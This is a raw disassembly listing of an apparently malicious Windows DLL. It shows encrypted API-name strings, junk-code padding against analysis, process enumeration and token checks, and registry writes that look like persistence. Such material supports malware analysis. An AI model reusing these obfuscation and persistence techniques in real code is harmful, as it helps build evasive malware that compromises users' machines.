mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
xor eax, eax
push ebp
push offset loc_10004621
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_1], 0
lea ecx, [ebp+var_18]
mov edx, 20200437h
mov eax, offset dword_10004638
call sub_100022B8
mov eax, [ebp+var_18]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
mov eax, 40h
call sub_100010F0
mov [ebp+var_8], eax
mov [ebp+var_C], 40h
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+var_8]
push eax
call [ebp+var_10]
lea eax, [ebp+var_14]
mov edx, [ebp+var_8]
call sub_1000180C
lea eax, [ebp+var_14]
mov edx, [ebp+var_14]
call sub_10001770
lea ecx, [ebp+var_1C]
mov edx, 20200437h
mov eax, offset dword_10004650
call sub_100022B8
mov eax, [ebp+var_1C]
call sub_10004484
test al, al
jz short loc_10004606
lea ecx, [ebp+var_20]
mov edx, 20200437h
mov eax, offset dword_10004668
call sub_100022B8
mov edx, [ebp+var_20]
mov eax, [ebp+var_14]
call sub_10001924
jnz short loc_10004606
mov [ebp+var_1], 1
loc_10004606: ; CODE XREF: sub_10004540+A1�j
; sub_10004540+C0�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10004628
loc_10004613: ; CODE XREF: sub_10004540+E6�j
lea eax, [ebp+var_20]
mov edx, 4
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10004621: ; DATA XREF: sub_10004540+17�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10004613
; ---------------------------------------------------------------------------
loc_10004628: ; CODE XREF: sub_10004540+E0�j
; DATA XREF: sub_10004540+CE�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_10004540 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 0Ch
dword_10004638 dd 6F4D5D70h, 704F5948h, 3242D5Eh, 0 dd 0FFFFFFFFh, 0Eh
dword_10004650 dd 4A650274h, 4E484C54h, 2E2D2954h, 3626h, 0FFFFFFFFh
; DATA XREF: sub_10004540+8D�o
dd 4
dword_10004668 dd 435D5656h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004670 proc near ; CODE XREF: CODE:10005F2B�p
; CODE:100060E6�p ...
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFDBCh
xor eax, eax
mov [ebp+var_240], eax
mov [ebp+var_244], eax
mov [ebp+var_23C], eax
mov [ebp+var_238], eax
xor eax, eax
push ebp
push offset loc_1000488E
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_238]
mov edx, 20200437h
mov eax, offset dword_100048A4
call sub_100022B8
mov eax, [ebp+var_238]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_C], eax
pusha
nop
rol ecx, 0B8h
rol ecx, 45h
ror edx, 0CCh
ror ecx, 0B6h
mov ebx, esi
nop
mov edx, 46h
mov ecx, esi
nop
xor edx, edi
popa
pusha
ror ecx, 4Fh
xor esi, ebx
add eax, 0D4h
xor ebx, edi
xor esi, 0DDh
xor edx, eax
rol edi, 0F0h
nop
nop
ror eax, 77h
nop
add ebx, 56h
nop
nop
inc eax
nop
mov edi, ecx
xor eax, edx
add ecx, 83h
xor ebx, edx
sub ecx, 9Ch
dec ebx
nop
sub edi, 43h
add esi, 0AAh
inc edx
nop
sub esi, 1Ah
nop
inc esi
inc ecx
dec eax
nop
ror edi, 0E6h
mov esi, ebx
mov edi, 0A8h
xor esi, eax
nop
xor edi, ecx
nop
xor ebx, esi
xor ecx, edi
sub edx, 0
mov esi, 0DEh
inc edx
add ebx, 0DCh
dec edx
ror ebx, 0B8h
popa
pusha
sub eax, 54h
xor ecx, edi
mov edx, ebx
ror ebx, 81h
inc eax
sub edi, 7Ah
nop
inc eax
nop
mov edi, 10h
inc esi
add edx, 9
dec ecx
inc eax
rol esi, 0F7h
xor ecx, 0E0h
ror ebx, 9Eh
dec eax
nop
sub esi, 1Ah
dec edx
xor ebx, esi
dec ecx
ror eax, 8Fh
xor esi, 78h
ror edx, 0Ah
nop
mov esi, 40h
inc ecx
popa
lea ecx, [ebp+var_23C]
mov edx, 20200437h
mov eax, offset dword_100048BC
call sub_100022B8
mov eax, [ebp+var_23C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
mov [ebp+var_1], 0
call ds:dword_10008830
push eax
push 8
call ds:dword_1000881C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_10004866
mov [ebp+var_234], 224h
lea eax, [ebp+var_234]
push eax
mov eax, [ebp+var_8]
push eax
call [ebp+var_C]
test eax, eax
jz short loc_10004866
jmp short loc_10004854
; ---------------------------------------------------------------------------
loc_1000480E: ; CODE XREF: sub_10004670+1F4�j
lea eax, [ebp+var_240]
lea edx, [ebp+var_214]
mov ecx, 100h
call sub_1000183C
mov eax, [ebp+var_240]
push eax
lea ecx, [ebp+var_244]
mov edx, 20200437h
mov eax, offset dword_100048D4
call sub_100022B8
mov edx, [ebp+var_244]
pop eax
call sub_10001924
jnz short loc_10004854
mov [ebp+var_1], 1
jmp short loc_10004866
; ---------------------------------------------------------------------------
loc_10004854: ; CODE XREF: sub_10004670+19C�j
; sub_10004670+1DC�j
lea eax, [ebp+var_234]
push eax
mov eax, [ebp+var_8]
push eax
call [ebp+var_10]
test eax, eax
jnz short loc_1000480E
loc_10004866: ; CODE XREF: sub_10004670+17E�j
; sub_10004670+19A�j ...
mov eax, [ebp+var_8]
push eax
call ds:dword_10008818
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10004895
loc_1000487D: ; CODE XREF: sub_10004670+223�j
lea eax, [ebp+var_244]
mov edx, 4
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_1000488E: ; DATA XREF: sub_10004670+26�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_1000487D
; ---------------------------------------------------------------------------
loc_10004895: ; CODE XREF: sub_10004670+21D�j
; DATA XREF: sub_10004670+208�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_10004670 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Dh
dword_100048A4 dd 4F5D577Ah, 0C0E5957h, 31332979h, 37h, 0FFFFFFFFh, 0Ch
; DATA XREF: sub_10004670+3C�o
dword_100048BC dd 4F5D577Ah, 0C0E5957h, 36392571h, 0 dd 0FFFFFFFFh, 0Bh
dword_100048D4 dd 5F505A64h, 1051507Fh, 2D2C5Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100048E0 proc near ; CODE XREF: CODE:10005D2D�p
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_170 = dword ptr -170h
var_160 = dword ptr -160h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_3C = byte ptr -3Ch
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFE7Ch
xor edx, edx
mov [ebp+var_184], edx
mov [ebp+var_180], edx
mov [ebp+var_17C], edx
mov [ebp+var_18], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_10004BC5
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_17C]
mov edx, 20200437h
mov eax, offset dword_10004BD8
call sub_100022B8
mov eax, [ebp+var_17C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_48], eax
lea ecx, [ebp+var_180]
mov edx, 20200437h
mov eax, offset dword_10004BF0
call sub_100022B8
mov eax, [ebp+var_180]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_4C], eax
lea ecx, [ebp+var_184]
mov edx, 20200437h
mov eax, offset dword_10004C0C
call sub_100022B8
mov eax, [ebp+var_184]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_50], eax
mov [ebp+var_19], 0
push 0
push 2
call ds:dword_1000881C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz loc_10004AD5
mov [ebp+var_178], 128h
lea eax, [ebp+var_178]
push eax
mov eax, [ebp+var_8]
push eax
call ds:dword_10008824
test eax, eax
jz loc_10004ACB
call ds:dword_10008830
mov [ebp+var_C], eax
loc_100049E8: ; CODE XREF: sub_100048E0+1E5�j
mov eax, [ebp+var_170]
cmp eax, [ebp+var_C]
jnz loc_10004AB2
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
call [ebp+var_4C]
push eax
call [ebp+var_48]
mov eax, [ebp+var_2C]
mov [ebp+var_24], eax
mov eax, [ebp+var_28]
mov [ebp+var_20], eax
mov eax, [ebp+var_160]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
push eax
push 0
push 410h
call ds:dword_10008820
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_10004ACB
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+var_10]
push eax
call [ebp+var_48]
test eax, eax
jz short loc_10004AA6
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
call [ebp+var_50]
test eax, eax
setl [ebp+var_19]
lea eax, [ebp+var_18]
mov edx, 400h
call sub_10001AB4
push 400h
mov eax, [ebp+var_18]
call sub_100019D8
push eax
push 0
mov eax, [ebp+var_10]
push eax
call ds:dword_1000882C
mov eax, [ebp+var_18]
call sub_100019D8
mov edx, eax
lea eax, [ebp+var_18]
call sub_1000180C
loc_10004AA6: ; CODE XREF: sub_100048E0+17A�j
mov eax, [ebp+var_10]
push eax
call ds:dword_10008818
jmp short loc_10004ACB
; ---------------------------------------------------------------------------
loc_10004AB2: ; CODE XREF: sub_100048E0+111�j
lea eax, [ebp+var_178]
push eax
mov eax, [ebp+var_8]
push eax
call ds:dword_10008828
test eax, eax
jnz loc_100049E8
loc_10004ACB: ; CODE XREF: sub_100048E0+F9�j
; sub_100048E0+15B�j ...
mov eax, [ebp+var_8]
push eax
call ds:dword_10008818
loc_10004AD5: ; CODE XREF: sub_100048E0+D6�j
cmp [ebp+var_19], 0
jz short loc_10004AE8
mov eax, [ebp+var_4]
mov edx, [ebp+var_18]
call sub_1000172C
jmp short loc_10004AF0
; ---------------------------------------------------------------------------
loc_10004AE8: ; CODE XREF: sub_100048E0+1F9�j
mov eax, [ebp+var_4]
call sub_100016D8
loc_10004AF0: ; CODE XREF: sub_100048E0+206�j
pusha
ror edx, 50h
mov edx, 2Eh
inc ecx
nop
rol edx, 73h
rol ecx, 0AEh
dec ecx
mov ebx, 4Fh
sub ebx, 8
ror edi, 0F1h
mov esi, ebx
popa
pusha
sub edx, 6Ch
nop
mov edx, eax
nop
mov eax, 0A0h
dec edi
mov ecx, 22h
dec ecx
nop
inc eax
xor esi, 0DEh
mov edx, edi
xor edx, eax
mov edx, eax
add esi, 3Ch
inc ecx
mov eax, ecx
dec eax
mov esi, eax
dec esi
ror ecx, 7
rol eax, 48h
dec esi
rol ecx, 0F5h
mov eax, 0DEh
popa
pusha
xor ecx, edi
ror edx, 0BFh
mov edx, edi
ror edi, 25h
sub esi, 8Bh
nop
mov edx, 0F2h
xor ecx, 84h
xor eax, edx
rol ebx, 0CFh
mov edi, 0Fh
xor esi, ebx
dec edi
ror ecx, 18h
xor ebx, edx
inc ebx
nop
dec edi
mov edx, edi
dec edx
mov ebx, edx
popa
cmp [ebp+var_19], 1
jnz short loc_10004B9F
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_10004B9F
mov eax, [ebp+var_4]
mov edx, offset dword_10004C24
call sub_1000172C
loc_10004B9F: ; CODE XREF: sub_100048E0+2A8�j
; sub_100048E0+2B0�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10004BCC
loc_10004BAC: ; CODE XREF: sub_100048E0+2EA�j
lea eax, [ebp+var_184]
mov edx, 3
call sub_100016FC
lea eax, [ebp+var_18]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_10004BC5: ; DATA XREF: sub_100048E0+26�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10004BAC
; ---------------------------------------------------------------------------
loc_10004BCC: ; CODE XREF: sub_100048E0+2E4�j
; DATA XREF: sub_100048E0+2C7�o
mov esp, ebp
pop ebp
retn
sub_100048E0 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Fh
dword_10004BD8 dd 6A4D5D70h, 5B5E5349h, 2B15334Ch, 36212Eh, 0FFFFFFFFh
; DATA XREF: sub_100048E0+3C�o
dd 11h
dword_10004BF0 dd 794D5D70h, 5B4F4E4Eh, 30113451h, 3520272Ch, 34h, 0FFFFFFFFh
; DATA XREF: sub_100048E0+6C�o
dd 0Fh
dword_10004C0C dd 4A545774h, 78584E5Ah, 16242C56h, 20292Ah, 0FFFFFFFFh
; DATA XREF: sub_100048E0+9C�o
dd 1
dword_10004C24 dd 2Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004C28 proc near ; CODE XREF: CODE:loc_10005D19�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
xor eax, eax
push ebp
push offset loc_10004CC2
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_1], 0
lea ecx, [ebp+var_10]
mov edx, 20200437h
mov eax, offset dword_10004CD8
call sub_100022B8
mov eax, [ebp+var_10]
call sub_100019D8
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_10004CA7
lea ecx, [ebp+var_14]
mov edx, 20200437h
mov eax, offset dword_10004CF0
call sub_100022B8
mov eax, [ebp+var_14]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_10004CA7
call [ebp+var_8]
mov [ebp+var_1], al
loc_10004CA7: ; CODE XREF: sub_10004C28+47�j
; sub_10004C28+77�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10004CC9
loc_10004CB4: ; CODE XREF: sub_10004C28+9F�j
lea eax, [ebp+var_14]
mov edx, 2
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10004CC2: ; DATA XREF: sub_10004C28+11�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10004CB4
; ---------------------------------------------------------------------------
loc_10004CC9: ; CODE XREF: sub_10004C28+99�j
; DATA XREF: sub_10004C28+87�o
mov al, [ebp+var_1]
mov esp, ebp
pop ebp
retn
sub_10004C28 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Ch
dword_10004CD8 dd 544B5D5Ch, 0C0E505Eh, 2E2D2411h, 0 dd 0FFFFFFFFh, 11h
dword_10004CF0 dd 5F7D4B7Eh, 595A4959h, 3011325Ah, 28203726h, 33h
; DATA XREF: sub_10004C28+51�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004D04 proc near ; CODE XREF: CODE:10005DFA�p
; CODE:10006908�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFC4h
xor ecx, ecx
mov [ebp+var_3C], ecx
mov [ebp+var_38], ecx
mov [ebp+var_34], ecx
mov [ebp+var_30], ecx
mov [ebp+var_2C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_10004E67
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_2C]
mov edx, 20200437h
mov eax, offset dword_10004E80
call sub_100022B8
mov eax, [ebp+var_2C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
lea ecx, [ebp+var_30]
mov edx, 20200437h
mov eax, offset dword_10004E98
call sub_100022B8
mov eax, [ebp+var_30]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_14], eax
lea ecx, [ebp+var_34]
mov edx, 20200437h
mov eax, offset dword_10004EB0
call sub_100022B8
mov eax, [ebp+var_34]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_18], eax
lea ecx, [ebp+var_38]
mov edx, 20200437h
mov eax, offset dword_10004EC8
call sub_100022B8
mov eax, [ebp+var_38]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_1C], eax
lea ecx, [ebp+var_3C]
mov edx, 20200437h
mov eax, offset dword_10004EE0
call sub_100022B8
mov eax, [ebp+var_3C]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_20], eax
push 0Ah
mov eax, [ebp+var_8]
push eax
mov eax, ds:dword_1000866C
push eax
call [ebp+var_10]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
push eax
mov eax, ds:dword_1000866C
push eax
call [ebp+var_14]
mov edx, [ebp+var_4]
mov [edx], eax
mov eax, [ebp+var_24]
push eax
mov eax, ds:dword_1000866C
push eax
call [ebp+var_18]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
push eax
call [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_10004E4C
mov eax, [ebp+var_28]
push eax
call [ebp+var_20]
loc_10004E4C: ; CODE XREF: sub_10004D04+13F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10004E6E
loc_10004E59: ; CODE XREF: sub_10004D04+168�j
lea eax, [ebp+var_3C]
mov edx, 5
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10004E67: ; DATA XREF: sub_10004D04+20�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10004E59
; ---------------------------------------------------------------------------
loc_10004E6E: ; CODE XREF: sub_10004D04+162�j
; DATA XREF: sub_10004D04+150�o
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_10004D04 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Dh
dword_10004E80 dd 5E575171h, 514E5969h, 2722324Ah, 2, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_10004D04+33�o
dword_10004E98 dd 5F435164h, 5B6F5A54h, 30342F4Ch, 2120h, 0FFFFFFFFh
; DATA XREF: sub_10004D04+5D�o
dd 0Ch
dword_10004EB0 dd 5E58577Bh, 514E5969h, 2722324Ah, 0 dd 0FFFFFFFFh, 0Ch
dword_10004EC8 dd 515A577Bh, 514E5969h, 2722324Ah, 0 dd 0FFFFFFFFh, 0Ch
dword_10004EE0 dd 5F5C4A71h, 514E5969h, 2722324Ah, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004EF0 proc near ; CODE XREF: CODE:10006850�p
; CODE:10006895�p
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_134 = dword ptr -134h
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEB8h
xor ecx, ecx
mov [ebp+var_140], ecx
mov [ebp+var_148], ecx
mov [ebp+var_144], ecx
mov [ebp+var_14], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_100051C8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_8]
call sub_100016D8
push 0
push 2
call ds:dword_1000881C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz loc_10005190
mov [ebp+var_13C], 128h
lea eax, [ebp+var_13C]
push eax
mov eax, [ebp+var_C]
push eax
call ds:dword_10008824
test eax, eax
jz loc_10005190
jmp loc_10005177
; ---------------------------------------------------------------------------
loc_10004F73: ; CODE XREF: sub_10004EF0+29A�j
lea eax, [ebp+var_144]
lea edx, [ebp+var_118]
mov ecx, 104h
call sub_1000183C
mov eax, [ebp+var_144]
lea edx, [ebp+var_140]
call sub_10003680
mov eax, [ebp+var_140]
push eax
lea edx, [ebp+var_148]
mov eax, [ebp+var_4]
call sub_10003680
mov edx, [ebp+var_148]
pop eax
call sub_10001924
jnz loc_1000516F
mov eax, [ebp+var_134]
push eax
push 0
push 410h
call ds:dword_10008820
mov [ebp+var_10], eax
pusha
nop
mov ebx, edx
xor ecx, esi
inc esi
dec ecx
ror edi, 0D9h
inc edi
ror edx, 29h
nop
sub edx, 0E1h
inc ebx
xor eax, 0B4h
nop
ror edi, 72h
sub edx, 30h
nop
inc ecx
add eax, 3
add edi, 18h
mov edx, eax
inc esi
nop
ror ecx, 78h
inc eax
rol esi, 25h
mov ecx, 3Ah
rol ebx, 4Fh
nop
sub ebx, 0DCh
xor edi, 6Eh
xor esi, eax
xor esi, 0B8h
mov edx, edi
add edx, 3
nop
inc ecx
add eax, 2Dh
sub esi, 0EBh
nop
inc edx
mov ebx, edx
dec ebx
popa
pusha
add esi, 4Fh
xor edi, ebx
xor eax, 0Ch
add eax, 98h
mov edi, 0D4h
xor edx, 0BDh
ror ecx, 7Bh
dec ebx
xor edi, ecx
inc eax
nop
mov eax, 0E4h
xor esi, 0CEh
ror edx, 34h
mov ecx, 1Eh
sub ebx, 0DCh
ror edi, 0F1h
xor esi, 83h
xor ecx, edi
dec edx
ror ebx, 0B7h
sub eax, 75h
nop
nop
nop
add eax, 7Fh
popa
pusha
inc eax
xor edi, ebx
sub edi, 29h
inc eax
dec esi
ror ebx, 0E0h
mov eax, ecx
mov ebx, 50h
add edi, 0BDh
inc edx
nop
ror edx, 38h
dec ebx
nop
rol edi, 37h
dec esi
ror ebx, 10h
nop
nop
rol ebx, 0F3h
mov eax, ecx
ror eax, 0BBh
nop
ror edi, 4Dh
dec esi
xor ebx, esi
add ecx, 4
mov edx, 0ECh
inc ecx
dec edi
add edx, 5Dh
nop
nop
inc edx
xor eax, 0ADh
rol edi, 0EEh
dec edx
sub ebx, 43h
nop
ror eax, 0D6h
xor edi, 94h
add edx, 7Dh
dec ecx
mov eax, 50h
nop
nop
dec eax
nop
mov esi, ebx
popa
cmp [ebp+var_10], 0
jz short loc_1000516F
xor eax, eax
push ebp
push offset loc_10005168
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_14]
mov edx, 104h
call sub_10001AB4
push 104h
mov eax, [ebp+var_14]
call sub_100019D8
push eax
push 0
mov eax, [ebp+var_10]
push eax
call ds:dword_1000882C
test eax, eax
jbe short loc_10005150
mov eax, [ebp+var_14]
call sub_100019D8
mov edx, eax
mov eax, [ebp+var_8]
call sub_1000180C
loc_10005150: ; CODE XREF: sub_10004EF0+24C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000516F
loc_1000515D: ; CODE XREF: sub_10004EF0+27D�j
mov eax, [ebp+var_10]
push eax
call ds:dword_10008818
retn
; ---------------------------------------------------------------------------
loc_10005168: ; DATA XREF: sub_10004EF0+218�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_1000515D
; ---------------------------------------------------------------------------
loc_1000516F: ; CODE XREF: sub_10004EF0+CB�j
; sub_10004EF0+213�j
; DATA XREF: ...
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jnz short loc_10005190
loc_10005177: ; CODE XREF: sub_10004EF0+7E�j
lea eax, [ebp+var_13C]
push eax
mov eax, [ebp+var_C]
push eax
call ds:dword_10008828
test eax, eax
jnz loc_10004F73
loc_10005190: ; CODE XREF: sub_10004EF0+55�j
; sub_10004EF0+78�j ...
mov eax, [ebp+var_C]
push eax
call ds:dword_10008818
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100051CF
loc_100051A7: ; CODE XREF: sub_10004EF0+2DD�j
lea eax, [ebp+var_148]
mov edx, 3
call sub_100016FC
lea eax, [ebp+var_14]
call sub_100016D8
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_100051C8: ; DATA XREF: sub_10004EF0+31�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100051A7
; ---------------------------------------------------------------------------
loc_100051CF: ; CODE XREF: sub_10004EF0+2D7�j
; DATA XREF: sub_10004EF0+2B2�o
mov esp, ebp
pop ebp
retn
sub_10004EF0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100051D4 proc near ; CODE XREF: CODE:10005EF3�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_121 = byte ptr -121h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEC4h
xor edx, edx
mov [ebp+var_13C], edx
mov [ebp+var_138], edx
mov [ebp+var_134], edx
mov [ebp+var_130], edx
mov [ebp+var_12C], edx
mov [ebp+var_128], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_1000546B
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_128]
mov edx, 20200437h
mov eax, offset dword_10005484
call sub_100022B8
mov eax, [ebp+var_128]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov [ebp+var_1C], eax
lea ecx, [ebp+var_12C]
mov edx, 20200437h
mov eax, offset dword_1000549C
call sub_100022B8
mov eax, [ebp+var_12C]
call sub_100019D8
push eax
mov eax, ds:dword_100087E8
push eax
call ds:dword_100087F8
mov [ebp+var_20], eax
mov [ebp+var_5], 1
mov [ebp+var_21], 0
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push 2000000h
push 0
push 0
push 0
lea ecx, [ebp+var_130]
mov edx, 20200437h
mov eax, offset dword_100054B4
call sub_100022B8
mov eax, [ebp+var_130]
call sub_100019D8
push eax
push 80000002h
call [ebp+var_1C]
test eax, eax
jnz loc_10005365
mov [ebp+var_14], 0FFh
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_121]
push eax
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_4]
call sub_100019D8
push eax
mov eax, [ebp+var_C]
push eax
call ds:dword_1000883C
test eax, eax
jnz short loc_1000532D
lea eax, [ebp+var_134]
lea edx, [ebp+var_121]
call sub_1000180C
mov eax, [ebp+var_134]
mov edx, [ebp+var_4]
call sub_10001924
jnz short loc_1000535B
mov [ebp+var_5], 0
mov eax, [ebp+var_C]
push eax
call ds:dword_10008840
jmp loc_10005445
; ---------------------------------------------------------------------------
loc_1000532D: ; CODE XREF: sub_100051D4+123�j
mov eax, [ebp+var_4]
call sub_10001854
push eax
mov eax, [ebp+var_4]
call sub_100019D8
push eax
push 1
push 0
mov eax, [ebp+var_4]
call sub_100019D8
push eax
mov eax, [ebp+var_C]
push eax
call [ebp+var_20]
test eax, eax
jnz short loc_1000535B
mov [ebp+var_21], 1
loc_1000535B: ; CODE XREF: sub_100051D4+144�j
; sub_100051D4+181�j
mov eax, [ebp+var_C]
push eax
call ds:dword_10008840
loc_10005365: ; CODE XREF: sub_100051D4+F0�j
cmp [ebp+var_21], 0
jnz loc_10005445
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push 2000000h
push 0
push 0
push 0
lea ecx, [ebp+var_138]
mov eax, offset dword_100054B4
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp+var_138]
call sub_100019D8
push eax
push 80000001h
call [ebp+var_1C]
test eax, eax
jnz loc_10005445
mov [ebp+var_14], 0FFh
